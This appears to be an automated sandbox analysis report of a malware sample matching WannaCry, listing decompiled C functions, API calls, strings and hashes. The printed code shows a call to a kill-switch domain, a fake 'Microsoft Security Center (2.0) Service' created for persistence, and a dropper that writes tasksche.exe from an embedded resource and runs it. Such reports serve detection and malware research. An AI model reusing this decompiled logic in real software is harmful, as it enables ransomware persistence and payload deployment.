Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}

0x00408155
0x00408157
0x00408158
0x0040815c
0x00408160
0x00408164
0x00408168
0x0040816c
0x00408177
0x0040817b
0x0040818e
0x00408194
0x004081a7
0x004081ab
0x004081ad
0x004081b9

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
InternetCloseHandle.WININET(00000000), ref: 004081A7
InternetCloseHandle.WININET(00000000), ref: 004081AB

Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5

Strings

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A

Memory Dump Source

Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
API String ID: 774561529-2942426231
Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}

0x00407c56
0x00407c6e
0x00407c72
0x00407cd3
0x00407c74
0x00407ca7
0x00407cab
0x00407cb2
0x00407cb9
0x00407cb9
0x00407cbc
0x00407cc9
0x00407cc9

APIs

sprintf.MSVCRT ref: 00407C56
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FFDFB10,00000000), ref: 00407C9B
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC

Strings

%s -m security, xrefs: 00407C50
Microsoft Security Center (2.0) Service, xrefs: 00407C90
mssecsvc2.0, xrefs: 00407C95

Memory Dump Source

Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
API String ID: 3340711343-4063779371
Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF

Uniqueness

Uniqueness Score: -1.00%

Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}

0x0040809f
0x004080a5
0x004080ab
0x004080ae
0x004080c9
0x004080cb
0x004080cd
0x004080e8
0x004080ea
0x004080ec
0x004080f1
0x004080fa
0x004080fa
0x004080fd
0x00408100
0x00408105
0x0040810e
0x00408116
0x0040811e
0x00408130
0x004080b0
0x004080b8
0x004080b8

APIs

GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
__p___argc.MSVCRT ref: 004080A5
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6FFDFB10,00000000,?,004081B2), ref: 004080DC
CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126

Strings

mssecsvc2.0, xrefs: 004080D6, 00408105

Memory Dump Source

Source File: 00000000.00000002.256054234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.256042958.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256121575.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256130271.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256194844.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
String ID: mssecsvc2.0
API String ID: 4274534310-3729025388
Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSNRf9dZ63.exePID: 4348, Parent PID: 552COMMON

Executed Functions

Function 00408090 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				int _t9;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, "C:\\Users\\frontdesk\\Desktop\\MSNRf9dZ63.exe", 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
					return _t9;
				} else {
					return E00407F20(_t26);
				}
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MSNRf9dZ63.exe,00000104,?,004081B2), ref: 0040809F
__p___argc.MSVCRT ref: 004080A5
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6FFDFB10,00000000,?,004081B2), ref: 004080DC
CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126

Strings

C:\Users\user\Desktop\MSNRf9dZ63.exe, xrefs: 00408098
mssecsvc2.0, xrefs: 004080D6, 00408105

Memory Dump Source

Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
String ID: C:\Users\user\Desktop\MSNRf9dZ63.exe$mssecsvc2.0
API String ID: 4274534310-374102796
Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF

Uniqueness

Uniqueness Score: -1.00%

Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 73%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x70f88c; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x70f888; // 0x0
				 *_t24 = _t47;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_t29 =  *0x70f884; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}

0x00409a19
0x00409a1b
0x00409a20
0x00409a2b
0x00409a2c
0x00409a39
0x00409a3e
0x00409a43
0x00409a4a
0x00409a51
0x00409a58
0x00409a5e
0x00409a64
0x00409a66
0x00409a6c
0x00409a72
0x00409a7b
0x00409a80
0x00409a85
0x00409a8b
0x00409a92
0x00409a98
0x00409a99
0x00409a9e
0x00409aa3
0x00409aa8
0x00409aad
0x00409ab2
0x00409acb
0x00409ad1
0x00409ad6
0x00409adb
0x00409ae8
0x00409aea
0x00409af0
0x00409b2c
0x00409b31
0x00409b32
0x00409b32
0x00409af2
0x00409af2
0x00409af2
0x00409af3
0x00409af6
0x00409af8
0x00409b03
0x00409b05
0x00409b05
0x00409b06
0x00409b06
0x00409b03
0x00409b09
0x00409b0d
0x00000000
0x00000000
0x00409b13
0x00409b1a
0x00409b24
0x00409b39
0x00409b26
0x00409b26
0x00409b26
0x00409b3a
0x00409b3b
0x00409b3c
0x00409b44
0x00409b45
0x00409b4a
0x00409b4e
0x00409b54
0x00409b59
0x00409b5b
0x00409b5e
0x00409b5f
0x00409b60
0x00409b67

APIs

__set_app_type.MSVCRT ref: 00409A43
__p__fmode.MSVCRT ref: 00409A58
__p__commode.MSVCRT ref: 00409A66
__setusermatherr.MSVCRT ref: 00409A92
_initterm.MSVCRT ref: 00409AA8
__getmainargs.MSVCRT ref: 00409ACB
_initterm.MSVCRT ref: 00409ADB
GetStartupInfoA.KERNEL32(?), ref: 00409B1A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00409B3E
exit.MSVCRT ref: 00409B4E
_XcptFilter.MSVCRT ref: 00409B60

Memory Dump Source

Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}

0x00408155
0x00408157
0x00408158
0x0040815c
0x00408160
0x00408164
0x00408168
0x0040816c
0x00408177
0x0040817b
0x0040818e
0x00408194
0x004081a7
0x004081ab
0x004081ad
0x004081b9

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
InternetCloseHandle.WININET(00000000), ref: 004081A7
InternetCloseHandle.WININET(00000000), ref: 004081AB

Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MSNRf9dZ63.exe,00000104,?,004081B2), ref: 0040809F
Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5

Strings

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A

Memory Dump Source

Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
API String ID: 774561529-2942426231
Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C40 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", "C:\\Users\\frontdesk\\Desktop\\MSNRf9dZ63.exe");
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}

0x00407c56
0x00407c6e
0x00407c72
0x00407cd3
0x00407c74
0x00407ca7
0x00407cab
0x00407cb2
0x00407cb9
0x00407cb9
0x00407cbc
0x00407cc9
0x00407cc9

APIs

sprintf.MSVCRT ref: 00407C56
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FFDFB10,00000000), ref: 00407C9B
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC

Strings

C:\Users\user\Desktop\MSNRf9dZ63.exe, xrefs: 00407C4B
mssecsvc2.0, xrefs: 00407C95
Microsoft Security Center (2.0) Service, xrefs: 00407C90
%s -m security, xrefs: 00407C50

Memory Dump Source

Source File: 00000001.00000002.252465051.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.252456994.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252477569.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252485261.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252529234.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252579362.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
String ID: %s -m security$C:\Users\user\Desktop\MSNRf9dZ63.exe$Microsoft Security Center (2.0) Service$mssecsvc2.0
API String ID: 3340711343-3227993485
Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF

Uniqueness

Uniqueness Score: -1.00%

Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				char _v572;
				short _v592;
				intOrPtr _v596;
				void* _v608;
				void _v636;
				char _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				intOrPtr _v692;
				intOrPtr _v700;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				intOrPtr _t64;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					_t64 =  *0x431478; // 0x75c61072
					 *0x43144c = _t36;
					if(_t64 != 0) {
						_t121 =  *0x431458; // 0x75c653c6
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x75c61282
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1);
												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
												if(_t107 != 0xffffffff) {
													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
													 *0x43144c(_t107);
													_v652 = 0;
													_v648 = 0;
													_v644 = 0;
													memset( &_v636, 0, 0x10 << 2);
													asm("repne scasb");
													_v656 = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v572 - 1, _t108, 0 << 2);
													_push( &_v656);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_push( &_v640);
													_push(0);
													_push(0);
													_push(0x8000000);
													_push(0);
													_push(0);
													_push(0);
													_push( &_v572);
													_push(0);
													_v640 = 0x44;
													_v592 = 0;
													_v596 = 0x81;
													if( *0x431478() != 0) {
														 *0x43144c(_v692);
														 *0x43144c(_v700);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}

0x00407cf5
0x00407cfb
0x00407d15
0x00407d22
0x00407d2f
0x00407d34
0x00407d36
0x00407d3c
0x00407d43
0x00407d49
0x00407d4f
0x00407d55
0x00407d5b
0x00407d7a
0x00407d7e
0x00407d86
0x00407d8e
0x00407d95
0x00407d9d
0x00407da1
0x00407daf
0x00407db3
0x00407dc4
0x00407dc8
0x00407dca
0x00407dcc
0x00407ddb
0x00407de2
0x00407def
0x00407df1
0x00407e01
0x00407e18
0x00407e2c
0x00407e49
0x00407e4e
0x00407e61
0x00407e68
0x00407e72
0x00407e7a
0x00407e82
0x00407e8b
0x00407e95
0x00407e9b
0x00407e9f
0x00407ea8
0x00407eb0
0x00407ebb
0x00407ebc
0x00407ec6
0x00407ec7
0x00407ec8
0x00407ec9
0x00407ece
0x00407ecf
0x00407ed0
0x00407ed1
